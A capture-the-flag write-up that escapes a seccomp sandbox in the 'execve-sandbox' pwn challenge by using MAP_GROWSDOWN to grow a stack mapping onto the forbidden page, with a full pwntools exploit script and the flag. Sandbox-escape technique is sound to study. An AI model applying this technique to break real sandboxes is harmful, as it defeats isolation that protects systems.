What a kewl sandbox! Seccomp makes it impossible to execute ./flag

nc execve-sandbox.ctfcompetition.com 1337


283 points, 23 Solves, pwn

We are given the source to a sandbox that reads a Elf64 binary, initializes the sandbox, then runs the sandboxed program. It does this by first checking that none of the Elf sections are within the range 0x10000-0x11000, then uses seccomp to only allow a few safe syscalls.

static int install_syscall_filter(unsigned long mmap_min_addr)
  int allowed_syscall[] = {
    SCMP_SYS(rt_sigreturn), SCMP_SYS(rt_sigaction), SCMP_SYS(rt_sigprocmask), SCMP_SYS(sigreturn), 
    SCMP_SYS(exit_group), SCMP_SYS(exit), SCMP_SYS(brk), SCMP_SYS(access), SCMP_SYS(fstat), SCMP_SYS(write),
    SCMP_SYS(close), SCMP_SYS(mprotect), SCMP_SYS(arch_prctl), SCMP_SYS(munmap), SCMP_SYS(fstat),
    SCMP_SYS(readlink), SCMP_SYS(uname),
  scmp_filter_ctx ctx;
  unsigned int i;
  int ret;

  ctx = seccomp_init(SCMP_ACT_KILL);
  if (ctx == NULL) {
    return -1;

  for (i = 0; i < sizeof(allowed_syscall) / sizeof(int); i++) {
    if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, allowed_syscall[i], 0) != 0) {
      ret = -1;
      goto out;

  /* prevent mmap to map mmap_min_addr */
  if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mmap), 1,
                       SCMP_A0(SCMP_CMP_GE, mmap_min_addr + PAGE_SIZE)) != 0) {
    ret = -1;
    goto out;

  /* first execve argument (filename) must be mapped at mmap_min_addr */
  if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(execve), 1,
                       SCMP_A0(SCMP_CMP_EQ, mmap_min_addr)) != 0) {
    ret = -1;
    goto out;

  puts("[*] seccomp-bpf filters installed");

  ret = seccomp_load(ctx);
  if (ret != 0)

  return ret;

It also allows execve but only if the first argument is 0x10000 and allows mmap but only if the address is greater than or equal to 0x11000.

The end goal is to run the flag program in the current directory, but as 0x10000 isn’t mapped and seccomp wont allow us to mmap it, it seems impossible.

After a bit of reading I came across MAP_GROWSDOWN which I’d only used for creating fake stacks before, but I realised that it could be used to defeat the sandbox!

From the mmap man page:


This flag is used for stacks. It indicates to the kernel virtual memory system that the mapping should extend downward in memory. The return address is one page lower than the memory area that is actually created in the process’s virtual address space. Touching an address in the “guard” page below the mapping will cause the mapping to grow by a page. This growth can be repeated until the mapping grows to within a page of the high end of the next lower mapping, at which point touching the “guard” page will result in a SIGSEGV signal.

I was interested in how this was actually handled by the kernel, and tracing through __do_page_fault in arch/x86/mm/fault.c we come to:

if (!(vma->vm_flags & VM_GROWSDOWN)) {
    bad_area(regs, error_code, address);
  if (error_code & PF_USER) {
    if (address + 65536 + 32 * sizeof(unsigned long) < regs->sp) {
      bad_area(regs, error_code, address);
  if (expand_stack(vma, address)) {
    bad_area(regs, error_code, address);

So as long as MAP_GROWSDOWN has been set and the current stack pointer is less than the page fault address + 0x10100, expand_stack will be called which calls expand_downwards to map a new page.

We just map a page at 0x11000 with the MAP_GROWSDOWN flag set, then set the stack to 0x11000 and push something. This will cause the kernel to automatically map another page so the stack page is now 0x10000-0x12000. We can now write ./flag to 0x10000 and run execve.

Using all the amazing helper functions of pwntools this turn out to be pretty simple:

#!/usr/bin/env python2
from pwn import *

def exploit():
  code = ""
  code += shellcraft.syscall('SYS_mmap', 0x11000, 0x1000, 
    constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC,
    constants.MAP_GROWSDOWN | constants.MAP_ANONYMOUS | constants.MAP_PRIVATE,
     0, 0
  code += "mov rsp, 0x11000\n"
  code += shellcraft.pushstr("./flag")
  code += shellcraft.memcpy(0x10000, 'rsp', 6)
  code += shellcraft.syscall('SYS_execve', 0x10000, 0, 0)
  code += shellcraft.exit(0)

  elf = make_elf(asm(code), extract=True, strip=True )

  payload = elf.ljust(0x1000, "\x00")
  p.sendafter("binary...", payload)

  print p.recvall()

if __name__ == "__main__":
  name = "./execve-sandbox"
  binary = ELF(name)

  context.terminal=["tmux", "sp", "-h"]
  context.arch = "amd64"
  context.os = "linux"

  if len(sys.argv) > 1:
    p = remote("execve-sandbox.ctfcompetition.com", 1337)
    p = process(name, cwd="./sandbox", env={})

    gdb.attach(p, """
      set follow-fork-mode child


Which prints out the flag CTF{Time_to_read_that_underrated_Large_Memory_Management_Vulnerabilities_paper}